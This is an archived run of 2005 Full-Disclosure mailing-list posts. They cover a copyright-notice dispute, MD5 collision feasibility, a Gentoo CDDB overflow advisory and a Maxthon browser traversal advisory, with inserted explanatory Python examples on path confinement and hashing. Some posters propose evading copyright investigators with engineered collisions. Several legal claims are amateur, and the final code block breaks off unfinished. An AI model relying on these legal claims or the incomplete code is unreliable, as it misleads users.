Date: Thu Apr 07 2005 - 21:48:04 CDT
Civil vs Criminal cases dude, you're imposing some aspects of criminal
cases upon civil proceedings and that's not how they work. In a
criminal trial it's a dramatized version of reasonable doubt, civil
proceedings must show 51%+ responsibility on the part of the defendant
(much, much easier and why the powers that be choose this route). Not
to mention it's their content (no harm, no foul on downloading
something they already own) and MPAA/RIAA/blah have set precedence for
proactively tracking (either themselves or appointed parties)
file-sharing events (method of access is not unlawful and cannot be
brought into contention...is BitTorrent inherently illegal when used
for legit purposes? -- nope).
If bb knocks on your door then you argue evidentiary process otherwise
in a civil proceeding you bear more of a burden to show you *didn't*
do what they're claiming (right or wrong they do have the legal upper
hand with their records versus essentially a verbal denial at best).
'Probably just easier to not download the crap and stay off the radar, $0.02.
On Apr 7, 2005 7:26 PM, Jason <security at brvenik.com> wrote:
> IANAL but it seems this thought process is broken.
>
> Jason Coombs wrote:
> > Come on, people, get a clue.
> >
> > The copyright owner has authorized the forensic investigators to
> > download the infringing material. If it was there, according to a
> > forensic investigator, then you have to prove it was not.
>
> This position does not hold water, there is no way for them to not break
> the same laws they would be attempting to enforce by performing the
> investigation from a remote location and without a valid search warrant.
> You do not have to prove that you did not have the content, you only
> have to prove that you have content that appears very similar to the
> remote reviewer.
>
> If you were to place a copyrighted work of your own there then would
> they be forced to download it and break the law in order to prove that
> it was not the other copyright owners property? If they show in the logs
> as having attempted a download does this make them guilty?
>
> It is as simple as creating a server that will return filenames and
> hashes found on the network but actually provide /dev/random for the
> download or your copyrighted content with an engineered hash collision.
>
> It only takes one case to prevent the civil suit from being filed. To
> file the suit would be admitting to having broken the law. You cannot
> bring suit when the basis of the suit is itself illegal activity.
--
AJC
spook3y3s at gmail.com
From: Jason (security at brvenik.com)
Date: Thu Apr 07 2005 - 22:15:38 CDT
I think you are missing my point.
AJ C wrote:
> Civil vs Criminal cases dude, you're imposing some aspects of criminal
> cases upon civil proceedings and that's not how they work. In a
> criminal trial it's a dramatized version of reasonable doubt, civil
> proceedings must show 51%+ responsibility on the part of the defendant
> (much, much easier and why the powers that be choose this route). Not
> to mention it's their content (no harm, no foul on downloading
> something they already own)
My point is that all you have to do is provide content they do not own
but do download or attempt to download for this test to fail. Simply the
existence of content with an advertised hash and name that is the same
as other content does not prove they own the content or that it is even
there. The act of downloading the content they think they own but in
fact do not is a violation of the same law they are attempting to get
you with.
There is no combination of the civil and criminal here. I am saying that
the accuser having committed a crime prevents them from bringing civil
suit based on the laws they themselves have violated. If they do bring
suit they are ultimately going to fail while providing all of the
information you need to be successful in a civil case and likely a
criminal case.
> and MPAA/RIAA/blah have set precedence for
> proactively tracking (either themselves or appointed parties)
> file-sharing events (method of access is not unlawful and cannot be
> brought into contention...is BitTorrent inherently illegal when used
> for legit purposes? -- nope).
Correct, you providing your copyrighted content to authorized users is a
fully valid use of the technology. The RIAA downloading that content to
ensure it is not their copyrighted content is a violation of the law.
The case is closed.
>
> If bb knocks on your door then you argue evidentiary process otherwise
> in a civil proceeding you bear more of a burden to show you *didn't*
> do what they're claiming (right or wrong they do have the legal upper
> hand with their records versus essentially a verbal denial at best).
I have the proof in the situation I presented. I have the actual logs
showing that they did in fact download content that was not theirs and
that the information they are presenting to justify the case is in fact
a false representation.
>
> 'Probably just easier to not download the crap and stay off the radar, $0.02.
I don't download the crap, not because it is illegal but because I
believe people should be paid for the work they do. If I do not believe
the work is not worth the price I don't buy it.
I would not be opposed to creating a service that simply advertised
filenames and hashes to the network but did not provide the actual
content just to prove that the approach is both flawed and ultimately
just as illegal.
From: Valdis.Kletnieks at vt.edu
Date: Thu Apr 07 2005 - 23:42:52 CDT
On Thu, 07 Apr 2005 14:52:55 PDT, Mike Owen said:
> As reported over the last few months, MD5 is very broken. MD5
> collisions are very easy to generate, with some reports of as little
> as a few hours needed on reasonable hardware to generate a collision.
There's now a known attack for generating 2 strings that happen to hash
to the same MD5 hash value fairly easily.
The more general problem of generating a second string that hashes to
an already known/fixed MD5 hash is still basically infeasible (unless you're
a very well funded spook agency *and* know something the rest of us don't)...
From: announcements at pulltheplug.org
Date: Fri Apr 08 2005 - 00:44:07 CDT
Just reminding people and correcting ourselves
this weekend there is a format strings tutorial by nemo
(nemo at felinemenace.org) scheduled at 3:00PM AEST Saturday April 9th
which is 05:00 GMT Saturday April 9th
(GMT will be the norm in the future)
We've gotten a few emails and needed to correct/remind.
http://www.pulltheplug.org/about/suntzu/ for details.
- people at pulltheplug dot org
(who says mailing lists aren't addictive)
From: class101 at HAT-SQUAD.com
Date: Fri Apr 08 2005 - 06:00:49 CDT
It would be nice to take your crap discussion elsewhere; to start with, this thread
shouldn't be there, thx Mr Coombs.
-------------------------------------------------------------
class101
Jr. Researcher
Hat-Squad.com
-------------------------------------------------------------
----- Original Message -----
From: "AJ C" <spook3y3s at gmail.com>
To: "Jason" <security at brvenik.com>; <full-disclosure at lists.grok.org.uk>
Sent: Friday, April 08, 2005 4:48 AM
Subject: Re: [Full-disclosure] Re: Case ID 51560370 - Notice of Claimed Infringement
> Civil vs Criminal cases dude, you're imposing some aspects of criminal
> cases upon civil proceedings and that's not how they work. In a
> criminal trial it's a dramatized version of reasonable doubt, civil
> proceedings must show 51%+ responsibility on the part of the defendant
> (much, much easier and why the powers that be choose this route). Not
> to mention it's their content (no harm, no foul on downloading
> something they already own) and MPAA/RIAA/blah have set precedence for
> proactively tracking (either themselves or appointed parties)
> file-sharing events (method of access is not unlawful and cannot be
> brought into contention...is BitTorrent inherently illegal when used
> for legit purposes? -- nope).
>
> If bb knocks on your door then you argue evidentiary process otherwise
> in a civil proceeding you bear more of a burden to show you *didn't*
> do what they're claiming (right or wrong they do have the legal upper
> hand with their records versus essentially a verbal denial at best).
>
> 'Probably just easier to not download the crap and stay off the radar, $0.02.
>
> On Apr 7, 2005 7:26 PM, Jason <security at brvenik.com> wrote:
> > IANAL but it seems this thought process is broken.
> >
> > Jason Coombs wrote:
> > > Come on, people, get a clue.
> > >
> > > The copyright owner has authorized the forensic investigators to
> > > download the infringing material. If it was there, according to a
> > > forensic investigator, then you have to prove it was not.
> >
> > This position does not hold water, there is no way for them to not break
> > the same laws they would be attempting to enforce by performing the
> > investigation from a remote location and without a valid search warrant.
> > You do not have to prove that you did not have the content, you only
> > have to prove that you have content that appears very similar to the
> > remote reviewer.
> >
> > If you were to place a copyrighted work of your own there then would
> > they be forced to download it and break the law in order to prove that
> > it was not the other copyright owners property? If they show in the logs
> > as having attempted a download does this make them guilty?
> >
> > It is as simple as creating a server that will return filenames and
> > hashes found on the network but actually provide /dev/random for the
> > download or your copyrighted content with an engineered hash collision.
> >
> > It only takes one case to prevent the civil suit from being filed. To
> > file the suit would be admitting to having broken the law. You cannot
> > bring suit when the basis of the suit is itself illegal activity.
> --
> AJC
> spook3y3s at gmail.com
From: Thierry Carrez (koon at gentoo.org)
Date: Fri Apr 08 2005 - 06:19:59 CDT
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200504-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: GnomeVFS, libcdaudio: CDDB response overflow
Date: April 08, 2005
Bugs: #84936
ID: 200504-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
The GnomeVFS and libcdaudio libraries contain a buffer overflow that
can be triggered by a large CDDB response, potentially allowing the
execution of arbitrary code.
Background
==========
GnomeVFS is a filesystem abstraction library for the GNOME desktop
environment. libcdaudio is a multi-platform CD player development
library. They both include code to query CDDB servers to get Audio CD
track titles.
Affected packages
=================
-------------------------------------------------------------------
     Package                  /  Vulnerable    /  Unaffected
-------------------------------------------------------------------
  1  gnome-base/gnome-vfs        < 2.8.4-r1       >= 2.8.4-r1
  2  media-libs/libcdaudio       < 0.99.10-r1     >= 0.99.10-r1
-------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
-------------------------------------------------------------------
Description
===========
Joseph VanAndel has discovered a buffer overflow in Grip when
processing large CDDB results (see GLSA 200503-21). The same overflow
is present in GnomeVFS and libcdaudio code.
Impact
======
A malicious CDDB server could cause applications making use of GnomeVFS
or libcdaudio libraries to crash, potentially allowing the execution of
arbitrary code with the privileges of the user running the application.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All GnomeVFS users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=gnome-base/gnome-vfs-2.8.4-r1"
All libcdaudio users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/libcdaudio-0.99.10-r1"
References
==========
[ 1 ] CAN-2005-0706
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0706
[ 2 ] GLSA 200503-21
http://www.gentoo.org/security/en/glsa/glsa-200503-21.xml
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200504-07.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.0
From: Michael Holstein (michael.holstein at csuohio.edu)
Date: Fri Apr 08 2005 - 08:31:57 CDT
>>That's why if you wanted, you could sell bags of flour as cocaine and not be
>>charged with drug dealing. Fine, it looks the same and weighs the same,
>>however it isn't the product that's illegal. And to prove that it's illegal,
>>they need to test it.
Well ... tell that to these idiots :
http://www.cleveland.com/search/index.ssf?/base/news/111269368272792.xml?nohio
~Mike.
From: buford.t.pisser (buford.t.pisser at verizon.net)
Date: Fri Apr 08 2005 - 09:04:50 CDT
Michael Holstein wrote:
>
>>> That's why if you wanted, you could sell bags of flour as cocaine
>>> and not be
>>> charged with drug dealing. Fine, it looks the same and weighs the same,
>>> however it isn't the product that's illegal. And to prove that it's
>>> illegal,
>>> they need to test it.
>>
>
> Well ... tell that to these idiots :
>
> http://www.cleveland.com/search/index.ssf?/base/news/111269368272792.xml?nohio
>
>
>
> ~Mike.
Yes but there was actually coke in all of the mess. I guess that if they
say that just because there were ones and zeros in the file that they
downloaded, then they may be able to bust Jason on that level. Highly
unlikely. Whatever happened to innocent until PROVEN guilty? Why does he
have to prove his innocence? Let them prove his guilt.
Marvin R. Myers CISSP
From: Aviv Raff (avivra at gmail.com)
Date: Fri Apr 08 2005 - 11:08:11 CDT
Maxthon browser multiple vulnerabilities advisory
URL: http://www.raffon.net/advisories/maxthon/multvulns.html
Date: April 08, 2005
Author: Aviv Raff
Introduction
"Maxthon Internet Browser software is a powerful tabbed browser with a
highly customizable interface. It is based on the Internet Explorer browser
engine..." (From Maxthon website <http://www.maxthon.com/> ).
In order to enhance the user experience, Maxthon uses a model of plug-ins.
Maxthon exposes an API, which allows plug-ins to read/write to files. These
functions allow the plug-ins to perform those operations on any directory on
the running computer. Moreover, in order to call Maxthon's API functions
from a plug-in, a "secure id" must be provided. This id can be easily
fetched, and therefore the API functions can be called from any web site the
user visits.
Technical Details
1) Maxthon's plug-ins use readFile and writeFile API functions to read and
write from/to files on the plug-in's directory. It is possible to read and
write from/to files on any other directory, due to lack of directory
traversal character sequences validation.
2) Maxthon allows calling to API functions only when a "security id" of a
plug-in is provided. The "security id" of a plug-in is auto-generated when a
plug-in is used for the first time in the current Maxthon session. Side bar
plug-ins include the "security id" in a file named "max.src" on the
plug-in's directory. By including this file in a script on a web page, it is
possible to call functions that will read and write to local files, manage
tabs, etc.
A combination of the above vulnerabilities can be exploited to potentially
allow remote code execution.
Tested versions: 1.2.0; 1.2.1
Older versions might also be affected.
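The weakness in item 1 is the absence of any check that the path handed to readFile/writeFile stays inside the plug-in's directory. The usual fix is to resolve the requested path fully (collapsing ".." and following symlinks) and then confirm that the resolved path still lies under the plug-in directory. The following is an added example written for this page, not Maxthon's code or its fix; the helper names, the temporary plug-in directory and the file names in the demo are assumptions of the example:

```python
import os
import tempfile


class PathOutsidePluginDir(ValueError):
    """Raised when a requested file would resolve outside the plug-in's directory."""


def confine_to_plugin_dir(plugin_dir: str, requested: str) -> str:
    """Return an absolute path for `requested` that is guaranteed to lie inside plugin_dir.

    Hypothetical helper for this example. The check is made on the fully resolved
    path, not on the raw string, so '..' sequences, absolute paths and symlinks
    pointing elsewhere are all caught by the same comparison.
    """
    base = os.path.realpath(plugin_dir)
    # Treat every request as relative to the plug-in directory. Without the
    # lstrip, an absolute path would replace `base` inside os.path.join.
    target = os.path.realpath(os.path.join(base, requested.lstrip("/\\")))
    if os.path.commonpath([base, target]) != base:
        raise PathOutsidePluginDir(f"{requested!r} resolves outside {base}")
    return target


def read_plugin_file(plugin_dir: str, requested: str) -> bytes:
    """Hardened counterpart of a readFile-style API: confine the path first, then read."""
    with open(confine_to_plugin_dir(plugin_dir, requested), "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Build a throwaway plug-in directory (constructed sample data) and probe the check.

    Returns, per requested name, the bytes read, "denied" when confinement
    rejected it, or "missing" when it was confined but does not exist.
    """
    root = tempfile.mkdtemp()
    plugin_dir = os.path.join(root, "plugins", "example")
    os.makedirs(plugin_dir)
    with open(os.path.join(plugin_dir, "max.src"), "wb") as fh:
        fh.write(b"plugin data")
    with open(os.path.join(root, "secret.txt"), "wb") as fh:
        fh.write(b"outside the plug-in dir")
    # A symlink inside the plug-in directory that points outside it.
    os.symlink(os.path.join(root, "secret.txt"), os.path.join(plugin_dir, "link"))

    results = {}
    for name in ["max.src", "../../secret.txt", "link", "/etc/hostname", "sub/../max.src"]:
        try:
            results[name] = read_plugin_file(plugin_dir, name)
        except PathOutsidePluginDir:
            results[name] = "denied"
        except FileNotFoundError:
            results[name] = "missing"
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name!r}: {outcome!r}")
```

Comparing `commonpath` of the resolved paths is what makes the symlink case work: a string prefix check on the unresolved request would accept "link" because it contains no traversal characters at all.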
Proof of Concept
The following is a local file reading proof of concept.
A default Maxthon installation is assumed, and also that the M2Bookmark side
bar plug-in (installed by default) has already been used in the current
Maxthon session.
http://www.raffon.net/advisories/maxthon/nosecidpoc.html
Timetable
27-Mar-2005: Vendor informed.
28-Mar-2005: Vendor confirmed vulnerability.
08-Apr-2005: Vendor published a fixed version.
08-Apr-2005: Public disclosure.
Solution
Upgrade to version 1.2.2.
Disclaimer: The information in this advisory and any of its demonstrations
is provided "as is" without warranty of any kind.
-- Copyright (C) 2005 Aviv Raff. --
From: bkfsec (bkfsec at sdf.lonestar.org)
Date: Fri Apr 08 2005 - 10:20:41 CDT
Thomas Sutpen wrote:
>On Apr 5, 2005 5:01 AM, Ag. System Administrator <sysadmin at agent.co.il> wrote:
>
>
>>More nice will be if this .iso file is just 451,486k of /dev/random junk.
>>Any proves that this file __IS__ Sybase Powerbuilder 9 Enterprise.iso?
>>MD5? Something?
>>
>>
>
>The question that begs to be asked is how they verified it.
>If they were to download copyrighted software from somebody sharing
>copyrighted software, does this not also constitute a crime? Is it
>not true that downloading illegally shared software is itself illegal?
> I'm not a lawyer, of course, but it's been my observation that the
>legal system doesn't often smile on those breaking the law to prove
>that others are breaking the law, unless it's in a Hollywood movie, no
>pun intended.
>
>Perhaps copyright makes some sort of concession for this. But it
>makes one wonder...
>
>
>
It's not illegal if you're either the original copyright holder, or are
provided a license by the original copyright holder.
It's also really the act of distribution that is the "crime" (ahem, it's
actually a tort violation)...
-Barry
From: bkfsec (bkfsec at sdf.lonestar.org)
Date: Fri Apr 08 2005 - 10:25:25 CDT
Randall Perry wrote:
> No, it isn't quite that clean.
> The initial post was regarding eDonkey/eMule client.
> The files are broken into chunks.
> The files are 'verified' by a one-way hash.
>
Which brings up another couple of questions:
1. Some networks of this type distribute their seeds in random
caches amongst their population. If you don't know it's there, are you
liable for it?
2. For a copyright violation to occur, you need a "significant
portion of the original work." Does having a chunk that qualifies as
1/30th of a copyrighted work qualify for copyright violation via unauthorized
distribution? I don't know and IANAL, but I'd say that it's questionable.
-Barry
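Randall's two sentences (files broken into chunks, each chunk verified by a one-way hash) describe the mechanism the rest of the thread argues about, so here is an added example of how such verification behaves. It is written for this page and is not eMule's, eDonkey's or any client's code: the chunk size, the use of SHA-256 in place of the network's own hash, and the function names are assumptions of the example, not the ed2k format. Each chunk carries its own digest, a root digest commits to the list of chunk digests, and a chunk that fails can be re-fetched on its own.

```python
import hashlib
import random

# Chunk size is an assumption of this example; real networks use much larger chunks.
CHUNK_SIZE = 64 * 1024


def chunk_hashes(data: bytes, chunk_size: int = CHUNK_SIZE) -> list:
    """Digest of each fixed-size chunk, in order: the per-chunk 'fingerprints'."""
    return [hashlib.sha256(data[i:i + chunk_size]).digest()
            for i in range(0, len(data), chunk_size)]


def root_hash(hashes: list) -> bytes:
    """Digest over the concatenated chunk digests: one identifier for the whole file."""
    return hashlib.sha256(b"".join(hashes)).digest()


def verify_chunks(received: list, expected_hashes: list) -> list:
    """Indices of received chunks whose digest does not match the published list.

    Each chunk is checked on its own, so a client can discard and re-fetch only
    the bad ones. Note what passing proves: the chunk has the expected digest,
    which is the same content as the published file only if no digest
    collision is involved.
    """
    if len(received) != len(expected_hashes):
        raise ValueError("chunk count does not match the published hash list")
    return [idx for idx, (chunk, want) in enumerate(zip(received, expected_hashes))
            if hashlib.sha256(chunk).digest() != want]


def simulate_transfer(seed: int = 7) -> dict:
    """Constructed scenario: publish a file, receive it with one corrupt chunk, re-fetch."""
    rng = random.Random(seed)
    original = bytes(rng.getrandbits(8) for _ in range(3 * CHUNK_SIZE + 1000))
    published = chunk_hashes(original)
    published_root = root_hash(published)

    # Split into chunks as a downloader sees them, then flip one bit in chunk 1.
    chunks = [original[i:i + CHUNK_SIZE] for i in range(0, len(original), CHUNK_SIZE)]
    damaged = bytearray(chunks[1])
    damaged[10] ^= 0x01
    received = [chunks[0], bytes(damaged), chunks[2], chunks[3]]
    bad_before = verify_chunks(received, published)

    # Re-fetch only the chunks that failed, then re-verify and check the root hash.
    for idx in bad_before:
        received[idx] = chunks[idx]
    bad_after = verify_chunks(received, published)
    return {
        "chunks": len(chunks),
        "bad_before_refetch": bad_before,
        "bad_after_refetch": bad_after,
        "root_matches": root_hash(chunk_hashes(b"".join(received))) == published_root,
    }


if __name__ == "__main__":
    print(simulate_transfer())
```

The per-chunk check is why a single bad peer costs a downloader one chunk rather than the whole file, and it is also why Barry's later point matters: the only thing a verifier learns from a passing chunk is that its digest matches.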
From: bkfsec (bkfsec at sdf.lonestar.org)
Date: Fri Apr 08 2005 - 10:30:40 CDT
Thierry Zoller wrote:
>RP> Otherwise, it is _possible_ to have a chunk with the same fingerprint and
>RP> make it appear that you have said chunk of their iso.
>That's *AFAIK* not possible, if this would be true the edonkey/emule
>protocol would have a big design flaw and people couldn't even trade
>millions of files every day, some (most?) downloads would be corrupted
>as they could have potentially downloaded a wrong chunk which in fact
>is from another file.
>
>
>
Of course it's possible. All hashes, by their very nature, have
collisions. The only way to have a truly unique identifier is to use
the actual content of the file (or chunk) itself. The minute you
distill the content down to a hash, you're guaranteeing that collisions
will occur.
They are, however, somewhat rare. That's why the system works as
relatively well as it does.
Regarding corrupt files via P2P protocols... no file transferred via P2P
has _ever_ transferred bad data and wound up corrupt, right? :)
/friendly sarcasm.
-Barry
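Barry's point that every hash has collisions and Valdis' earlier distinction (finding any two colliding inputs is now easy for MD5, finding a second input for one fixed MD5 value is not) are two sides of the same fact: the generic cost of a collision on an ideal n-bit hash is about 2^(n/2) trials, the cost of a second preimage about 2^n. The following added example, written for this page rather than taken from any poster, makes both costs visible by truncating MD5 to n bits so the searches finish in seconds; the truncation is the example's device, not a property of MD5, and the function names are assumptions.

```python
import hashlib
import math


def truncated_md5(data: bytes, bits: int) -> int:
    """MD5 restricted to its first `bits` bits: a scaled-down stand-in for the 128-bit hash."""
    digest = hashlib.md5(data).digest()
    return int.from_bytes(digest, "big") >> (128 - bits)


def expected_trials(bits: int) -> dict:
    """Generic attack cost on an ideal n-bit hash: birthday bound vs exhaustive search."""
    return {
        "collision": math.sqrt(math.pi / 2 * 2 ** bits),  # any two inputs that agree
        "second_preimage": float(2 ** bits),              # must agree with one fixed target
    }


def find_collision(bits: int, max_trials: int = 1 << 22):
    """Birthday search: (m1, m2, trials) with m1 != m2 and equal truncated hashes, or None.

    Memory grows with the number of trials, which is the classic time/memory
    shape of a birthday attack; the expected trial count is about 2^(bits/2).
    """
    seen = {}
    for i in range(max_trials):
        msg = b"collision-search:" + i.to_bytes(8, "big")  # distinct, deterministic inputs
        h = truncated_md5(msg, bits)
        if h in seen:
            return seen[h], msg, i + 1
        seen[h] = msg
    return None


def find_second_preimage(target: bytes, bits: int, max_trials: int):
    """Exhaustive search for a different message with the truncated hash of `target`, or None.

    There is no shortcut here: every candidate is compared against one fixed
    value, so the expected trial count is about 2^bits.
    """
    want = truncated_md5(target, bits)
    for i in range(max_trials):
        msg = b"second-preimage:" + i.to_bytes(8, "big")
        if msg != target and truncated_md5(msg, bits) == want:
            return msg, i + 1
    return None


if __name__ == "__main__":
    # 32 bits: a collision is found after tens of thousands of hashes.
    m1, m2, n = find_collision(32)
    print("32-bit collision after", n, "trials:", m1, m2)
    # 16 bits: a second preimage is within reach; at 32 bits the same loop
    # would need on the order of four billion hashes.
    print("16-bit second preimage:", find_second_preimage(b"target file chunk", 16, 1 << 20))
    print("expected cost at 32 bits:", expected_trials(32))
```

At 128 bits the same arithmetic gives roughly 2^64 trials for a generic collision and 2^128 for a second preimage; the 2004 MD5 results cut the first number down to something practical, which is exactly why the two properties have to be discussed separately.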
From: bkfsec (bkfsec at sdf.lonestar.org)
Date: Fri Apr 08 2005 - 10:34:12 CDT
Thierry Zoller wrote:
>You forget that the hash is not the only unique thing that specific file
>has in common with the pirated file/material.
>
>Calculate the following probability:
>
>- The file/chunk has the same MD5 (or whatever HASH)
> as the pirated material in question.
>- The file has the EXACT same filename (if there would be a collision
>how is the probability in mathematical terms that the file the
>collision takes place has the exact same filename?)
>- The file has the EXACT same size (The file has the EXACT same date
>etc.pp)
>
>
>
>
These factors do not come into play when you're talking about P2P
protocols that use seeded chunks to share their files. When a
particular file is split up into chunks and each chunk is appropriately
named on the host, the file itself (depending on the P2P protocol)
doesn't always harbor a descriptive name. The name of the file is
stored in the protocol and file names/dates can very well be different.
These aren't the same issues as verifying a filesystem that you
control. It's a lot more complex than that.
-Barry
From: bkfsec (bkfsec
sdf.lonestar.org)
Date: Fri Apr 08 2005 - 11:07:08 CDT
Jason wrote:
> My point is that all you have to do is provide content they do not own
> but do download or attempt to download for this test to fail. Simply
> the existence of content with an advertised hash and name that is the
> same as other content does not prove they own the content or that it
> is even there. The act of downloading the content they think they own
> but in fact do not is a violation of the same law they are attempting
> to get you with.
Interesting.
I like that idea.
Craft a file with the same hash, time+date stamp and size, and be sure
to include a program and license disclosure for a program that you
wrote. Do something to gain the attention of the BSA, share the file,
and when they download it, sue them for copyright violation, demanding
royalties for the software they possess.
Now, there's a rub: putting the file up on a P2P network could be
considered willful distribution and, as such, could invalidate the
claim. However, misconfiguring your software might get you around that.
You might still lose for a number of reasons, not the least of which is
that on a good day, the courts are supposed to mediate these issues, not
award damages by default... and on a bad day the court just becomes a
tool of corporate assault on the consumer. Let's face it, lately the
courts and legislature (not to mention the executive) have been more
favorable to big business than to consumers and small-time producers.
-Barry
Valdis.Kletnieks
vt.edu
Date: Fri Apr 08 2005 - 11:23:07 CDT
On Fri, 08 Apr 2005 12:07:08 EDT, bkfsec said:
> Craft a file with the same hash, time+date stamp and size, and be sure
> to include a program and license disclosure for a program that you
> wrote.
Unfortunately, nobody has a good algorithm for creating a file that has the
same MD5 hash as a given existing file. So while I *can* create two files
"foo1" and "foo2" that happen to have the same hash (the actual value of which
I have no control over), I can't (yet) create a file that has the same MD5 hash
as the trailer for the next Star Wars movie...
auto447062
hushmail.com
Date: Fri Apr 08 2005 - 10:57:37 CDT
>all the MSN Messngers and MSN Plus are vulnerable.
>
>NOTE: successful exploitation requires that a user has logged in
recently...
PW cached recently? %^)
BS"D, check again.
From: dk (dk
pwarchitects.com)
Date: Fri Apr 08 2005 - 11:47:50 CDT
Valdis.Kletnieks
vt.edu wrote:
> On Fri, 08 Apr 2005 12:07:08 EDT, bkfsec said:
>>Craft a file with the same hash, time+date stamp and size, and be sure
>>to include a program and license disclosure for a program that you
>>wrote.
> Unfortunately, nobody has a good algorithm for creating a file that has the
> same MD5 hash as a given existing file. So while I *can* create two files
> "foo1" and "foo2" that happen to have the same hash (the actual value of which
> I have no control over), I can't (yet) create a file that has the same MD5 hash
> as the trailer for the next Star Wars movie...
Modding the p2p app to falsely match specific remote chunks against
crafted local files seems an easier route than trying to find
collisions. :) Then again, it would break the swarming feature of
whatever app you modded & 'prolly be breaking some other U.S. Law.
--
dk
From: Jason (security
brvenik.com)
Date: Fri Apr 08 2005 - 11:50:24 CDT
Valdis.Kletnieks
vt.edu wrote:
> On Fri, 08 Apr 2005 12:07:08 EDT, bkfsec said:
>>Craft a file with the same hash, time+date stamp and size, and be sure
>>to include a program and license disclosure for a program that you
>>wrote.
> Unfortunately, nobody has a good algorithm for creating a file that has the
> same MD5 hash as a given existing file. So while I *can* create two files
> "foo1" and "foo2" that happen to have the same hash (the actual value of which
> I have no control over), I can't (yet) create a file that has the same MD5 hash
> as the trailer for the next Star Wars movie...
I think that entirely depends on the format the file is distributed in.
You could take a zipfile and pad it in non critical areas to change the
MD5 without creating a substantial difference in the deliverable
content. You could do the same with gzip or bzip formatted files. You
could also pad any embedded jpeg images to engineer a collision. There
are quite a few opportunities where this method could be used to twiddle
the new MD5 without materially changing the content.
Here is the case I am thinking about.
Software that is ~150M in size, it gets redistributed as a new file that
is 160M in size but has a collision with your software which is also
160M in size. I imagine there would be some computational time involved
to find the appropriate collision but a lot less computational time than
finding a perfect match to the original.
Now everyone must download both files to know for sure that there is a
violation, in performing this download they are violating the law
themselves. I doubt you would be awarded any royalties as a result of
this but it would take all of the meat out of further prosecution
efforts since they would have to be able to prove they did not violate
the law and in fact downloaded only the correct version.
Valdis.Kletnieks
vt.edu
Date: Fri Apr 08 2005 - 12:20:08 CDT
On Fri, 08 Apr 2005 12:50:24 EDT, Jason said:
> I think that entirely depends on the format the file is distributed in.
> You could take a zipfile and pad it in non critical areas to change the
> MD5 without creating a substantial difference in the deliverable
> content. You could do the same with gzip or bzip formatted files. You
> could also pad any embedded jpeg images to engineer a collision. There
> are quite a few opportunities where this method could be used to twiddle
> the new MD5 without materially changing the content.
It's easy to tweak a file and get a different MD5. That's why Tripwire works.
> Software that is ~150M in size, it gets redistributed as a new file that
> is 160M is size but has a collision with your software which is also
> 160M in size. I imagine there would be some computational time involved
> to find the appropriate collision but a lot less computational time than
> finding a perfect match to the original.
You're missing the point.
Let's say we have a file A that's 150M in size, and a file B that's 160M in
size. File B is *not* under our control, and has a known fixed MD5 hash.
It's easy to take file A, and create 2 files C and D from it that happen to
have the same MD5 hash as each other. What is *NOT* easy is creating a file E
that has the same hash as A or B.
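The exchange above has two halves that a worked example separates cleanly: Jason's point that a zip can be padded in a non-critical area so its MD5 changes without touching the content, and Valdis's point that producing *some* colliding pair is a very different job from matching the hash of a fixed file you do not control. The code below is an added example written for this page, not code from either poster. A deliberately truncated SHA-256 stands in for MD5 so both searches finish in seconds; the member name, payloads, search prefixes and bit sizes are assumptions made for the demo.

```python
"""Added example, not code from the thread.

pad_zip_comment() does the cheap thing: it stores bytes in the end-of-archive
comment of a zip, so the archive's MD5 changes while every member's contents
stay identical.

find_collision() and find_second_preimage() show the asymmetry: finding any two
inputs with equal n-bit digests costs about 2^(n/2) work (birthday bound), but
matching the digest of a fixed, existing input costs about 2^n.  So a 32-bit
collision and a 16-bit second preimage are roughly the same amount of work.
"""
import hashlib
import io
import zipfile
from itertools import count


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def make_zip(name: str, payload: bytes) -> bytes:
    """Build an in-memory zip holding one member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


def pad_zip_comment(archive: bytes, pad: bytes) -> bytes:
    """Return `archive` with `pad` stored as its zip comment; member data is untouched.
    Append mode rewrites only the central directory and the end record."""
    buf = io.BytesIO(archive)
    with zipfile.ZipFile(buf, "a") as zf:
        zf.comment = pad
    return buf.getvalue()


def members(archive: bytes) -> dict:
    """name -> bytes for every member, i.e. the deliverable content."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return {n: zf.read(n) for n in zf.namelist()}


def trunc_hash(data: bytes, bits: int) -> int:
    """Toy n-bit digest: the leading `bits` bits of SHA-256."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") >> (256 - bits)


def find_collision(bits: int, prefix: bytes = b"chunk-") -> tuple:
    """Birthday search: any two distinct inputs with the same n-bit digest.
    Returns (m1, m2, tries); expected tries ~ 2^(bits/2)."""
    seen = {}
    for i in count():
        m = prefix + i.to_bytes(8, "big")
        h = trunc_hash(m, bits)
        if h in seen:
            return seen[h], m, i + 1
        seen[h] = m


def find_second_preimage(target: bytes, bits: int, prefix: bytes = b"fake-") -> tuple:
    """Brute force: an input whose n-bit digest equals that of a *given* target.
    Returns (m, tries); expected tries ~ 2^bits, the square of the collision cost."""
    want = trunc_hash(target, bits)
    for i in count():
        m = prefix + i.to_bytes(8, "big")
        if m != target and trunc_hash(m, bits) == want:
            return m, i + 1


def demo() -> dict:
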